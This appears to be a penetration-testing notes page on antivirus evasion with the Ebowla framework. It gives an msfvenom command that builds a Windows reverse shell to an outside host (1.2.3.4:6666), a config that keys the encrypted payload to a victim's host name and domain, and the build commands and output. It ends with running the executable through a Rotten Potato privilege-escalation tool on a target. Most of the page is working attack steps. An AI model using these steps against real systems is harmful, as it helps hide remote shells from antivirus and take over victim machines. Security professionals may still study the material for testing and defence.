Anti-Virus Evasion

GitHub Code:

GitHub - Genetic-Malware/Ebowla: Framework for Making Environmental Keyed Payloads (NO LONGER SUPPORTED)GitHub

Ebowla works by encoding the payload of the executable using environment variables. In this example, we are going to use the following environmental variables. This variables can be easily gathered from a victim box using systeminfo, hostname, ect....

Hostname: boxy01 Domain: WTH

The Config File

These are the basic things to change in order to get going with Ebowla. Basically, you specify the output type you want (GO, python or Powershell). You tell the code what kind of payload its going to be fed to the software (DLL, EXE, etc...) and finally you use specific the environment variables to have some sort of control over the way the payload gets encrypted and executed. This is extremely useful because if you just want to target a single user, you can just specify the username and the generated code won't work if executed under other usernames. However if you want to be able to use this code under all computers under a domain such as WTH.LOCAL, you can this as the environmental variable and the code will work on ALL computers as long as they part of the domain specified.

Template output

Type of file being fed to Ebowla

Environment Variables

Our Config

# vim genetic.config

# Template output: GO, Python, OR PowerShell 
    output_type = GO 

# Type of file fed to Ebowla
payload_type = EXE 

# Enviroment variables
    [[ENV_VAR]]
    
        username = ''
        computername = 'boxy01'
        homepath = ''
        homedrive = ''
        Number_of_processors = ''
        processor_identifier = ''
        processor_revision = ''
        userdomain = 'WTH.LOCAL'
        systemdrive = ''
        userprofile = ''
        path = ''
        temp = ''

Generate the Executable

# Using msfvenon to generate trhe payload
msfvenom -p windows/x64/shell_reverse_tcp LHOST=1.2.3.4 LPORT=6666 -f exe -a x64 -o shell_6666.exe 

# Checking the File
file shell_6666.exe 
shell_6666.exe: PE32+ executable (GUI) x86-64, for MS Windows  

Running Ebola with Payload

This generates the GO file.

# python ebowla.py shell_6666.exe genetic.config
[*] Using Symmetric encryption
[*] Payload length 7168
[*] Payload_type exe
[*] Using EXE payload template
[*] Used environment variables:
	[-] environment value used: computername, value used: boxy01
	[-] environment value used: userdomain, value used: wth.local
[!] Path string not used as pasrt of key
[!] External IP mask NOT used as part of key
[!] System time mask NOT used as part of key
[*] String used to source the encryption key: boxy01wth.local
[*] Applying 10000 sha512 hash iterations before encryption
[*] Encryption key: 967e1552331f3b8cccbcea0bfff30a964fb2a56953ebfbe5bd5c474d9d1a6b5c   
[*] Writing GO payload to: go_symmetric_shell_6666.exe.go

# Generated File
ls output/
go_symmetric_shell_6666.exe.go

Building the Final Executable

# Build the executable from the generated GO file and write it to output/
./build_x64_go.sh output/go_symmetric_shell_6666.exe.go wth_boxy01.exe
[*] Copy Files to tmp for building
[*] Building...
[*] Building complete
[*] Copy wth_boxy01.exe to output
[*] Cleaning up
[*] Done


# ls output/
go_symmetric_shell_6666.exe.go  wth_boxy01.exe

Uses for the executable

This can be easily used with Rotten Potato. You can get the exe file from this GitHub page and execute it on the target.

Potatoes and tokensDecoder's Blog

C:\path\to\execuatble\lonelypotato.exe * wth_boxy01.exe